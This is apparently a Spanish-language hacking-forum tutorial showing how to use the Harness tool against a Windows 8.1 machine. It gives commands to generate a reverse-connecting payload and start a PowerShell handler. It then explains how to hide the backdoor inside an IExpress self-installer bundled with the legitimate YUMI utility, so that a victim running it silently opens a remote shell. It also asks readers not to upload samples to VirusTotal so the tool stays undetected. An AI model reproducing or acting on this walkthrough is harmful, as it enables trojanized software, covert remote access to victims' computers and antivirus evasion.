(http://www.pcworld.com.mx/postsGenPic.aspx?i=26080)
Saludos amigos en este pequeño tutorial atacaremos un sistema windows 8.1 x86 con la herramienta harness.
(http://1.bp.blogspot.com/-kH_PXyHHxek/Vncx_Tt--eI/AAAAAAAADuw/YRyOFyenr4k/s1600/03.PNG)
Harness fue presentada en la DEFCON23 esta tool nos permite generar payload de acceso remoto con la capacidad de proporcioanar una interfaz de control remoto de powershell.
Vamos a ello.
Clonamos el proyecto desde Github
git clone https://github.com/rich5/Harness
Para la instalacion de la herramienta ejecutaremos los siguientes comandos.
cd Harness
chmod 755 python_install.sh
./python_install.sh
wget http://python.org/ftp/python/3.4.3/Python-3.4.3.tar.xz
tar xf Python-3.4.3.tar.xz
cd Python-3.4.3
./configure --prefix=/usr/local --enable-shared LDFLAGS="-Wl,-rpath /usr/local/lib"
make && make altinstall
(http://3.bp.blogspot.com/-2Uk-W9PpC98/VncyAYHKtPI/AAAAAAAADu8/3UfaxpTEwAw/s1600/01.png)
Tambien se ha corregido el bug con el autocompletado, para eso ejecuta los siguientes comando
apt-get install libssl-dev openssl
apt-get install python3-pip
apt-get install libcurses5-dev
pip3 install readline
python_install.sh
Ahora si stuxnet atack !!! xD
Ejecutamos harness de la siguiente manera
python3.4 harness.py
(http://1.bp.blogspot.com/-k6QtTDqEZNo/VncyAKSDMfI/AAAAAAAADu4/xZNwApcXUDA/s1600/00.png)
Ahora listaremos los módulos de la tool de la siguiente manera
show modules
(http://3.bp.blogspot.com/-8z8ABIInnhw/VncyAyGJ2FI/AAAAAAAADvA/Kzi2AZ7cmA8/s1600/04.png)
En este caso usare el ultimo payload ya que el windows que atacare es x86, para eso lo cargaremos de la siguiente manera.
load payloads/TCP/x86/exe/Harness_x86
y para ver sus opciones
show options
(http://2.bp.blogspot.com/-fJaPmQ7F8xc/VncyBdTGl7I/AAAAAAAADvI/mRJK4nMZqzE/s1600/05.png)
Ahora procederemos a configurarlo, IP = su ip y PORT el puerto que usaran en mi caso usare el 4444
(http://2.bp.blogspot.com/-PLICYCmI37E/VncyBsXRyeI/AAAAAAAADvQ/biLBu6qsHRA/s1600/06.png)
ahora ya configurado todo ejecutamos el comando
run y nos preguntara un nombre en mi caso underc0de.exe, se guardara en la carpeta de harness.
(http://4.bp.blogspot.com/-A7kQuvHMaMY/Vnc2MVu_qLI/AAAAAAAADwU/_tZPnYfILDw/s1600/000.png)
Ahora ejecutamos el comando
back y procederemos a configurar el handler
(http://3.bp.blogspot.com/-SNAf0hHpnrU/Vnc2zYmLWhI/AAAAAAAADwc/svdSGxs0i0k/s1600/handler.png)
load handlers/PSHandler
ahora lo procederemos a configurarlo
IP = Su IP
PORT = su puerto
SSL = false
(http://2.bp.blogspot.com/-SNKg91Z8R18/VncyCnl5PVI/AAAAAAAADvo/amWczcErloA/s1600/09.png)
Ahora si ejecutamos
run y tendremos en escucha nuestro handler xD ahora es hora de hacer un poco de ingeniería social y les mostrare un pequeño método.
(http://4.bp.blogspot.com/-7Sh2MegK6pE/VncyBzJlf0I/AAAAAAAADvc/mFGLKAvIcDA/s1600/10.png)
IExpress, creador de instaladores :3 Esta tool es nativa desde windows XP que nos permite crear archivos comprimidos y autoinstaladores.
Para esto utilizaremos cualquier aplicación que deseemos, en mi caso utilizare YUMI una simple tool para crear usb boteables y el backdoor
(http://2.bp.blogspot.com/-j2h7qBMj58Y/Vnc5s4l2eBI/AAAAAAAADw4/qvwbB2iIp4g/s1600/001.PNG)
y ahora el tipico siguiente
(http://4.bp.blogspot.com/-w91LtnmA3m8/Vnc5rfaZnuI/AAAAAAAADwo/Yp0NUUAEH3g/s1600/002.PNG)
En esta parte nos pedirá agregar las dos aplicaciones que deseamos :3
(http://4.bp.blogspot.com/-jST4lSNKDDw/Vnc5roq-fhI/AAAAAAAADws/VXmIs2JtAqE/s1600/003.PNG)
y ahora siguiente y configuramos de la siguiente manera para que el backdoor se ejecute en segundo plano
(http://1.bp.blogspot.com/-gk4DDF6k1bM/Vnc5tA7RREI/AAAAAAAADw8/hi_1nNdVHxs/s1600/004.PNG)
Luego en siguiente y dejamos esto asi
(http://2.bp.blogspot.com/-GiZkcHAa4hg/Vnc5td9kE5I/AAAAAAAADxA/OcU97mjGKq8/s1600/005.PNG)
y le ahora siguiente nos preguntara donde queremos guardar y luego terminar :3 y se genera nuestro autoinstalador para pasarselo a la victima
(http://2.bp.blogspot.com/-UcMls2nlByw/Vnc5txVTCzI/AAAAAAAADxQ/3XqbBaCSYig/s1600/006.PNG)
Ahora cuando nuestra victima ejecute el programa se abrira la aplicación de YUMI y por debajo el backdoor asi dando nuestra session de powershell !!!!
(http://1.bp.blogspot.com/-UOvXuxqQ9Tc/VncyCn1pdPI/AAAAAAAADvs/02O30SV4ObM/s1600/11.png)
ahora ejecutamos para ver nuestras sesiones
show sessions
(http://3.bp.blogspot.com/-ziCoTrUxDr8/VncyC53daII/AAAAAAAADvw/XMDYDcbpGyg/s1600/12.png)
Para interactuar con nuestra sesión lo hacemos de la siguiente forma y Fuegoooo en la cocinaa :3 lo que pase después esta en su imaginación.
session 1
(http://1.bp.blogspot.com/-bKcHjp3DYrY/VncyDMCqYeI/AAAAAAAADv0/AKILM0JPDrs/s1600/13.png)
(http://3.bp.blogspot.com/-EOkleab3UZ0/VncyDuQp8wI/AAAAAAAADwE/xs4CuMZn-98/s1600/14.png)
Nota: No subaan nada a virustotaaal no quemen esta maravillosa herramienta aun en desarrollo
Bytes:
Realmente se podria hasta con windows 10 y 7 lo hice con el 8.1 porque ya tenia montada la virtual. En todo caso solo seria de cambiar el payload para x64 o x86 y empezar a jugar con ella, como mencione todo esta en su imaginacion :3
Madre mia.. Muy buen aporte de invasion..
Fire bomb!!! :o